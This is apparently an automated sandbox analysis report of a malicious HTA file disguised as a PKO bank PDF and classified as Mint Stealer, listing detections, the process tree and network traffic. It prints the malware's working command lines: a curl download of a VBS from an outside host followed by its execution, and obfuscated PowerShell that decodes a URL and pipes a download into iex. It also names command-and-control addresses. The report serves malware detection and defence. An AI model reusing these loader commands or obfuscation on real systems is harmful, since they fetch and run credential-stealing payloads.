
Windows Analysis Report
PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta

Overview

General Information

Sample name: PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta (renamed because the original name is a hash value)
Original sample name: PKO_0019868519477_PDF_.hta
Analysis ID: 1576834
MD5: 8da85c61d9b033c0c6b99452a4d66976
SHA1: bf2e95e2c7d9e3690fcb323daefaba311021cea6
SHA256: 0f2b38a3af80d5eb72b72f5b5dfe2e57d155608e64ec79f03b4ec58f81a851bc
Tags: hta, user-cdcd

Detection

Mint Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Queries Google from non browser process on port 80
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 7356 cmdline: mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7588 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 7640 cmdline: curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • cmd.exe (PID: 7736 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7808 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • wscript.exe (PID: 8128 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js MD5: FF00E0480075B095948000BDC66E81F0)
    • cmd.exe (PID: 7828 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7916 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • wscript.exe (PID: 8176 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\pmxdhq.js MD5: FF00E0480075B095948000BDC66E81F0)
          • conhost.exe (PID: 6828 cmdline: conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp) MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2800 cmdline: powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5224 cmdline: conhost --headless powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv) MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 3448 cmdline: powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
Process Memory Space: powershell.exe PID: 2800 | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |
Process Memory Space: powershell.exe PID: 3448 | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security |

          System Summary

Source: File created | Author: frack113, Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7356, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\676198543e2f1[1].vbs
Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 45.11.180.77, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7808, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7736, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , ProcessId: 7808, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, CommandLine|base64offset|contains: _, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7356, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, ProcessId: 7588, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js, CommandLine: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7808, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js, ProcessId: 8128, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7736, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , ProcessId: 7808, ProcessName: wscript.exe
Source: File created | Author: Tim Shelton | Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 7808, TargetFilename: C:\Users\user\AppData\Local\Temp\riodfc.js
Source: Network Connection | Author: frack113 | Data: DestinationIp: 45.11.180.77, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7808, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, CommandLine|base64offset|contains: _, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7356, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, ProcessId: 7588, ProcessName: cmd.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7736, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , ProcessId: 7808, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp), CommandLine: powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp), ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6828, ParentProcessName: conhost.exe, ProcessCommandLine: powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp), ProcessId: 2800, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T16:30:22.996815+0100 | 2057063 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 193.149.129.61 | 80 | TCP
2024-12-17T16:30:23.043711+0100 | 2057063 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 193.149.129.61 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T16:30:22.996815+0100 | 2057743 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 193.149.129.61 | 80 | TCP
2024-12-17T16:30:23.043711+0100 | 2057743 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 193.149.129.61 | 80 | TCP


          AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.4% probability
Source: unknown | HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: tomation.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986687032.0000021C27D4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2057511026.000001596AF6D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdby source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 0000000F.00000002.1986687032.0000021C27D4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2057511026.000001596AF6D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: utomation.pdbb< source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdbntVersion source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AFA3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EA0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \mscorlib.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AEC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbZ& source: powershell.exe, 0000000F.00000002.1986024982.0000021C27CA3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb4 source: powershell.exe, 00000011.00000002.2059479627.000001596B16B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb` source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ows\System.Core.pdbpdb` source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbatP source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EA0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.2059479627.000001596B16B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ion.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: nt.Automation.pdb-4437-8B11-F424491E3931}\InprocSe source: powershell.exe, 00000011.00000002.2057511026.000001596AEC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986251858.0000021C27CE3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbK source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

Source: Network traffic | Suricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.4:49749 -> 193.149.129.61:80
Source: Network traffic | Suricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49749 -> 193.149.129.61:80
Source: Network traffic | Suricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.4:49748 -> 193.149.129.61:80
Source: Network traffic | Suricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49748 -> 193.149.129.61:80
Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 45.11.180.77 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: www.google.com | Connection: Keep-Alive
Source: Joe Sandbox View | ASN Name: DANISCODK DANISCODK
Source: Joe Sandbox View | ASN Name: M247GB M247GB
Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /676198543e20a/js/676198543e135.js HTTP/1.1 | Accept: */* | Accept-Language: en-CH | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /676198543e20a/676198543e2f1.vbs HTTP/1.1 | Accept: */* | Accept-Language: en-CH | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /list_files.php HTTP/1.1 | Accept: */* | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /list_files.php HTTP/1.1 | Accept: */* | Accept-Language: en-ch | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: pko-download.kagyouth.co.ke | Connection: Keep-Alive
